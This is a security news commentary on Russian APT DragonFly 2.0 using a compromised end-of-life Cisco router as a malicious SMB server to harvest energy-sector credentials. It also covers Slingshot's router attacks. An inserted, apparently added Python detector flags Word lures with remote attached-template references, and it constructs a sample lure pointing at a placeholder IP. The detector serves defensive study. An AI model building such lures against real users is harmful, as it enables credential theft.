
Russian APT Compromised Cisco Router in Energy Sector Attacks

CyberWisdom Safe Harbor Commentary on Cisco Router

A recent story warns that yet another nation-state hacking team has compromised network routers to achieve its ultimate goal: this time, the notorious Russian APT known as DragonFly 2.0.

The DragonFly hacking team, which has targeted US critical infrastructure, compromised a network router last year as part of its attack campaign against UK energy firms. Last week, the US federal government publicly called out the group for its attacks on the US energy grid.

This week, researchers from Cylance revealed that they had discovered the group compromised a core Cisco router on the network of Vietnam's largest manufacturer of oil rigs (a state-owned entity) in order to steal user credentials and ultimately infiltrate UK energy firms. Cylance said the abused Cisco router was an "end of life" network device that ultimately gave the attackers a launching point against energy-sector targets. DragonFly used the stolen credentials in a phishing lure against UK energy sector targets.

But according to Cylance's report, several pieces of this attack puzzle are still missing: how the router was compromised, and how the attackers reached the UK targets.

Kevin Livelli, director of threat intelligence at Cylance, said it is unclear whether the oil rig manufacturer is a supplier to the UK targets. Such a connection might explain how the group chose those targets, but Cylance did not find a direct link in its research.

"This is a bigger event that we are reporting here," Livelli said. "We discovered a decoy file embedded in malware samples during our ongoing study of this group. We can see that these decoy files are aimed at people in the UK energy sector."

If the victim opens the weaponized document, a resume, he or she inadvertently connects to the compromised router, which is acting as a malicious SMB server; the victim's machine automatically authenticates to it with the user's encrypted (hashed) credentials. "When users provide their credentials, the router collects those credentials," he said.

"The router was compromised separately and then incorporated into the attack," explained Livelli.
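As an added illustration of the mechanism described above (this is example code, not Cylance's or the article's): one common way a Word document is made to contact an attacker's SMB server the moment it is opened is a remote attached-template reference in word/_rels/settings.xml.rels, which Windows fetches over SMB and, in doing so, sends the user's NTLM hash. The page does not say which mechanism DragonFly used, so that is an assumption here. The detector below parses a .docx, flags external template targets, and distinguishes SMB fetches (which leak the hash off-network) from plain HTTP fetches. The sample documents are constructed in memory, and 203.0.113.0/24 is a documentation range standing in for an Internet-facing router; the internal/external address split is an assumption spelled out in the code.

```python
"""Added example: detect a Word lure that references a remote attached template,
the mechanism by which merely opening a document makes the victim's machine
authenticate to an attacker-controlled SMB server. Not Cylance's or the
article's code; the sample documents below are constructed in memory."""
import io
import ipaddress
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse
from xml.sax.saxutils import escape

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Relationship type Word uses for a document's attached .dotm/.dotx template.
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
# Address space treated as internal (assumption: RFC 1918, loopback, link-local).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]


def template_host(target):
    """Return (transport, host) for an attachedTemplate target.
    UNC and file: targets are fetched over SMB, which is what leaks the hash."""
    if target.startswith("\\\\"):
        return "smb", target.lstrip("\\").split("\\")[0]
    parsed = urlparse(target)
    scheme = parsed.scheme.lower()
    return ("smb" if scheme == "file" else scheme), (parsed.hostname or "")


def is_external(host):
    """IP literals outside INTERNAL_NETS are external. For DNS names, a dotted
    name is treated as external and a single-label name as internal (assumption)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "." in host
    return not any(ip in net for net in INTERNAL_NETS)


def assess_docx(docx_bytes):
    """Return one finding per external attachedTemplate relationship in a .docx.
    A document with no word/_rels/settings.xml.rels, or with only internal
    relationships, yields an empty list."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if "word/_rels/settings.xml.rels" not in zf.namelist():
            return findings
        root = ET.fromstring(zf.read("word/_rels/settings.xml.rels"))
        for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
            if rel.get("Type") != ATTACHED_TEMPLATE or rel.get("TargetMode") != "External":
                continue
            target = rel.get("Target", "")
            transport, host = template_host(target)
            external = is_external(host)
            findings.append({
                "target": target,
                "transport": transport,
                "host": host,
                "external": external,
                # Only an SMB fetch from an external host sends the NTLM hash off-network.
                "credential_leak": transport == "smb" and external,
            })
    return findings


def build_docx(template_target=None):
    """Build a minimal constructed .docx in memory, optionally carrying a remote
    attached-template relationship, so the detector can be exercised offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        if template_target is not None:
            safe_target = escape(template_target, {'"': "&quot;"})
            zf.writestr("word/_rels/settings.xml.rels",
                        f'<Relationships xmlns="{RELS_NS}">'
                        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                        f'Target="{safe_target}" TargetMode="External"/>'
                        '</Relationships>')
    return buf.getvalue()


# Constructed samples: 203.0.113.0/24 is a documentation range standing in for an
# Internet-facing router; "fileserver" is a legitimate single-label internal UNC host.
LURE_DOCX = build_docx("\\\\203.0.113.10\\templates\\cv.dotm")
CORP_DOCX = build_docx("\\\\fileserver\\templates\\corp.dotm")
CLEAN_DOCX = build_docx()

if __name__ == "__main__":
    for name, doc in (("lure", LURE_DOCX), ("corporate", CORP_DOCX), ("clean", CLEAN_DOCX)):
        print(name, assess_docx(doc))
```

Run over a mail quarantine or a sandbox's dropped files, a finding with credential_leak set to True is the document-side indicator of exactly the flow the article describes; the network-side counterpart is outbound TCP/445 from workstations to an address outside the organization, which should be blocked at the perimeter regardless.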

US-CERT and the FBI made a rare attribution announcement last week, stating that the Russian government is behind the DragonFly campaign targeting the energy, nuclear, commercial facilities, water, aviation and critical manufacturing sectors.

Router hacks are relatively rare, but this is the second time this month that a nation-state group has been reported using routers as an attack vector. Earlier this month, researchers at Kaspersky Lab reported that a nation-state cyber espionage campaign against targets in Africa and the Middle East, dubbed Slingshot, had infected MikroTik routers in order to harvest administrator credentials from its targets and then move laterally within the victim networks.

Slingshot, believed to be a sophisticated English-speaking hacking group, places a malicious dynamic link library (DLL) on the router that acts as a downloader for other malware. When a router administrator logs in to the device, the router infects his or her endpoint machine. Alexey Shulmin, chief malware analyst at Kaspersky Lab, told Dark Reading that router security is often overlooked and is a blind spot for most businesses.

Cylance's Livelli said that router hacking typically indicates a sophisticated threat group, because it keeps the attackers under the radar. "The compromise of a core router is a cause for concern because it is difficult to detect, difficult to investigate forensically, and difficult to repair and remediate," he said. "We don't have the same tools for analyzing and dealing with router firmware that we have for other systems."

CrowdStrike has also seen DragonFly 2.0, which it calls Berserk Bear, going after routers. "In the summer of 2017, CrowdStrike observed Berserk Bear, in connection with the energy-sector credential collection that took place during the same period, attempting to access an Internet-facing router," said Adam Meyers, CrowdStrike's vice president of intelligence. "The SMB credential-harvesting technique related to this activity is now fairly well known and is not a strong attribution anchor."

A Cisco spokesperson stated that the events reported by Cylance involve legacy routers rather than the company's latest generation of products, and that the issue is not a vulnerability in the router: the attacker must first steal the router administrator's credentials or somehow obtain physical access to the device. Cisco has previously warned, for example, of attackers gaining administrative or physical access to a Cisco IOS Classic router and replacing the operating system with a malicious version.

"While we can't speculate on the specifics of this case, our investigation found that in many cases malicious actors obtain administrator credentials through compromised authentication servers or social engineering," the Cisco spokesperson said.

Cylance said that DragonFly essentially used the Cisco router as its attack tool, and tied the activity to the attacks that the UK's National Cyber Security Centre warned about in mid-July 2017, as reported by Motherboard.



If you would like to receive more of these curated Safe Harbor news alerts, subscribe to my mailing list, and come back soon to read further CyberWisdom Safe Harbor Commentaries.